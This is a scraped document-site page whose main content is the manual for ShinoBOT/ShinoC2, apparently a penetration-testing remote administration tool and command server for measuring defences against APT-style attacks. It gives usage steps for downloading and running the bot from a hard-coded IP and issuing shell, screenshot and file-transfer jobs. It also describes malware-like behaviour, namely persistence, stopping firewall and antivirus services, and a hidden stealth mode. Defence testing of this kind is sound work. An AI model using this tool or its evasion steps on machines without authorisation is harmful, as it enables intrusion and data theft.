SHINOBOT/SHINOC2 MANUAL



Similar documents
ShinoBOT ShinoC2. Can you prevent APT like me? Author: Shota Shinogi. - the pentest tool to measure the defense against APT/RAT -

Spam Marshall SpamWall Step-by-Step Installation Guide for Exchange 5.5

Configuring Devices for Use with Cisco Configuration Professional (CCP) 2.5

pcanywhere Advanced Configuration Guide

Preventing credit card numbers from escaping your network

Using Microsoft Expression Web to Upload Your Site

IIS, FTP Server and Windows

MySQL Quick Start Guide

SETTING UP REMOTE ACCESS ON EYEMAX PC BASED DVR.

Setting Up Scan to SMB on TaskALFA series MFP s.

Mapping ITS s File Server Folder to Mosaic Windows to Publish a Website

Network Connect Installation and Usage Guide

File Manager Pro User Guide. Version 3.0

WinSCP Tutorial 01/28/09: Y. Liow

How To - Implement Clientless Single Sign On Authentication with Active Directory

Evoko Room Manager. System Administrator s Guide and Manual

Global Image Management System For epad-vision. User Manual Version 1.10

Sentral servers provide a wide range of services to school networks.

SecureAssess Local. Install Guide. Release 9.0

LogMeIn Network Console Version 8 Getting Started Guide

Chapter 23: Uploading Your Website to the Internet

How To Set Up Ops Cser.Com (Pros) For A Pc Or Mac) With A Microsoft Powerbook (Proos) (Prosecco) (Powerbook) (Pros) And Powerbook.Com/

SITRANS RD500 Configuring the RD500 with PSTN or GSM modems and Windows-based servers and clients for communication Objective:

Configuring Network Load Balancing with Cerberus FTP Server

Livezilla How to Install on Shared Hosting By: Jon Manning

Installation Notes for Outpost Network Security (ONS) version 3.2

Using IIS and UltraDev Locally page 1

Upgrade your Software

How to FTP (How to upload files on a web-server)

Smart Control Center. User Guide. 350 East Plumeria Drive San Jose, CA USA. November v1.0

Quick Connect. Overview. Client Instructions. LabTech

Release Notes. Contents. Release Purpose. Platform Compatibility. Licensing on the SRA Appliances and Virtual Appliance

Configure and enable remote access for windows operating system

Lab 8.3.3b Configuring a Remote Router Using SSH

Here, we will discuss step-by-step procedure for enabling LDAP Authentication.

MITA End-User VPN Troubleshooting Guide

How to use FTP Commander

ConnectIT. How to Connect and End a Remote Support Session. (for Windows & IE / Firefox)

Easy Setup Guide for the Sony Network Camera

How to use FTP to Upload files

Web based training for field technicians can be arranged by calling These Documents are required for a successful install:

Contents. Platform Compatibility. Known Issues

Help. F-Secure Online Backup

Secure Web Appliance. Reverse Proxy

Enterprise Security Interests Require SSL with telnet server from outside the LAN

Preparing for GO!Enterprise MDM On-Demand Service

MySQL quick start guide

enter the administrator user name and password for that domain.

Using SonicWALL NetExtender to Access FTP Servers

Remote Access: Internet Explorer

Working With Your FTP Site

Install MS SQL Server 2012 Express Edition

Troubleshooting / FAQ

Chapter 5 Configuring the Remote Access Web Portal

Installing Kaspersky Security Center 10.0 on Microsoft Windows Server 2012 Core Mode

Setting up VMware ESXi for 2X VirtualDesktopServer Manual

escan SBS 2008 Installation Guide

Intelli-M Access Quick Start Guide

How to Use Remote Access Using Internet Explorer

How-to: HTTP-Proxy and Radius Authentication and Windows IAS Server settings. Securepoint Security System Version 2007nx

Installing and Using WinSCP Client

External Device Management - Using SNMP - Enabling the Next Wave of Connectivity

How To Make A Backdoor On Windows Server From A Remote Computer From A Command Prompt On A Windows 2 Computer (Windows) On A Pc Or Ipad (Windows 2) On An Ipad Or Ipa (Windows 3) On Your Pc Or

Managed Devices - Web Browser/HiView

Common Services Platform Collector (CSPC) Self-Service - Getting Started Guide. November 2015

WhatsUp Gold v16.3 Installation and Configuration Guide

Customer Tips. Xerox Network Scanning HTTP/HTTPS Configuration using Microsoft IIS. for the user. Purpose. Background

Installing the Cisco AnyConnect YSU VPN Client Windows XP or later

CYAN SECURE WEB HOWTO. NTLM Authentication

Configuring Web services

SonicOS Enhanced Release Notes TZ 180 Series and TZ 190 Series SonicWALL, Inc. Firmware Release: August 28, 2007

SecuraLive ULTIMATE SECURITY

IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection

Implementing SSL Offload with JAGUAR Ver.1.0

State of Michigan Data Exchange Gateway. Web-Interface Users Guide

SFTP Server User Login Instructions. Open Internet explorer and enter the following url:

Comodo Endpoint Security Manager SME Software Version 2.1

TMS Phone Books Troubleshoot Guide

Filtering remote users with Websense remote filtering software v7.6

FileZilla: Uploading/Downloading Files to SBI FTP

How To Set Up A Backupassist For An Raspberry Netbook With A Data Host On A Nsync Server On A Usb 2 (Qnap) On A Netbook (Qnet) On An Usb 2 On A Cdnap (

Installing Drupal 8 on Windows 7 with XAMPP. I am trying to install Drupal 8 on my Windows machine as a development system.

Creating a Gateway to Client VPN between Sidewinder G2 and a Mac OS X Client

Tera Term Telnet. Introduction

User Guide. Version 3.2. Copyright Snow Software AB. All rights reserved.

CGS 1550 File Transfer Project Revised 3/10/2005

Wavelink Avalanche Mobility Center Java Console User Guide. Version 5.3

Test Case 3 Active Directory Integration

File Manager User Guide

JMC Next Generation Web-based Server Install and Setup

LDCDP GdW. L force Controls. Ä.GdWä. Software Manual. Industrial PC. WindowsR CE Thin Client. Operating system

The LRS File Transfer Service offers a way to send and receive files in a secured environment

The SyncBack Management System

2. PMP New Computer Installation. & Networking Instructions

System Administration Training Guide. S100 Installation and Site Management

SSH Secure Client (Telnet & SFTP) Installing & Using SSH Secure Shell for Windows Operation Systems

FTP Upload instructions for Wealden Group Ltd

Install FileZilla Client. Connecting to an FTP server

Configuring Trend Micro Content Security

Transcription:

SHINOBOT/SHINOC2 MANUAL Sh1n0g1 V E R : 1. 3. 2. 1 1

OVERVIEW ShinoBOT/ShinoC2 are penetration test tools for APT prevention. PURPOSE The purpose of ShinoBOT/ShinoC2 is to evaluate your protection against recent cyber attacks, like APT. ShinoBOT ShinoBOT is a RAT (remote administration tool). It connects to ShinoC2 via HTTP/HTTPS (newer version use HTTPS). ShinoC2 ShinoC2 is the C&C (command / control) server. You can create a job and send it to your ShinoBOT-affected devices. It has a web GUI so you can manipulate by your browser. ShinoBOT Access ShinoC2 Command 2

NOTICE TRY AT YOUR OWN RISK If you run ShinoBOT on your devices, be aware that it has the possibility to be controlled by anyone from the internet. there is a poor password protection to avoid it but don t overestimated them. I recommend not to try it on the machine which contains sensitive information has the permission to access on your file server / data server / active directory, etc. I have no responsibility for any machines affected by ShinoBOT, and any data leakage, any breakage. Again, try at your own risk. 3

HOW TO USE(1/4) 1. Prepare the target machine..net Framework 2.0 or later. Internet Accessibility 2. Download ShinoBOT on your target PC (http://54.244.189.77/shinoc2/shinobot.exe). 3. Run. 4. Note the password (you can copy by the right box). 4

HOW TO USE(2/4) 1. Switch to your machine (still using target machine also ok). 2. Access to ShinoC2 Web GUI; http://54.244.189.77/shinoc2/,chrome recommended. 3. Click [HOST] link. 4. Find your target host by host name, IP address, user name and click [Assign a job] link. 5

HOW TO USE(3/4) 1. Select the Job (means command) you want to run target machine runs. e.g.)system Info 2. Put the password you noted before. 3. Press the [Assign] button. 6

HOW TO USE(4/4) 1. Check the status on the job history section. Status : [Generated] -> [Accepted] -> [Done] 2. After the status changed into Done, you can check the result of the task in the Loot column. 7

HOW TO CREATE A NEW JOB 1. Click the [JOB] icon. 2. Put the parameter and click [Add new job]. NOTE Command will be send to cmd.exe, except those special commands: SBOTshot means screenshot. SBOTwget means the client will download the file specified. e.g.) SBOTwget:https://www.google.co.jp/images/srpr/logo4w.png SBOTfget means the client will upload the file specified. e.g.) SBOTfget:C: boot.ini SBOTrunA for running a process asynchronous; ShinoBot will not wait for the process end. e.g.) SBOTrunA:notepad.exe The job will be shared for everyone, so don t input any confidential data like credential info. If you try to execute a process will not end automatically, and don t use SBOTrunA, ShinoBOT will be stuck until the process end. For example Process with the GUI, notepad, calc. CUI Interactive Process like telnet, ftp. 8

Q&A Q. Does the ShinoBOT s C&C connection support proxy? A. Yes. But it does not support the auth-proxy. Specifically, if the user has already passed the authentication and no further authentication for new session, it will be able to access via auth -proxy. Q. How the password is managed? A. The password is generated when you run ShinoBOT the first time, then it is saved in the registry and uploaded to ShinoC2 in plain text. HKCU Software VB and VBA Program Settings ShinoBOT MachineInfo When the ShinoBot is executed again, it read the reg to use it as password. Q. Does it do anything else communicating and performing the command? A. Yes. it behaves like malware, create itself on the C:, write run reg, try to stop the Windows Firewall, McAfee & Symantec service. If it has no administrator priviledges, it fails. 9

Q&A Q. Does ShinoBOT need an administrative priviledges? A. It depends on the command (job) you want to run on it. Q. How the job is sent to the target machine? A. ShinoBOT polling to ShinoC2 every 10 seconds, if there is a new job, it will download and execute it. And send back the result to ShinoC2. 10

TIPS Stealth Mode Before running ShinoBOT at the first time, rename the ShinoBOT.exe into ShinoBOT_nosec.exe. The client GUI will be hidden. And the password will be admin123. 11

THANK YOU Thank you for using ShinoBOT/ShinoC2. If have any (technical) problem please contact me. @Sh1n0g1 Special Thanks to Tesshy for letting me attack his machine. 12

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information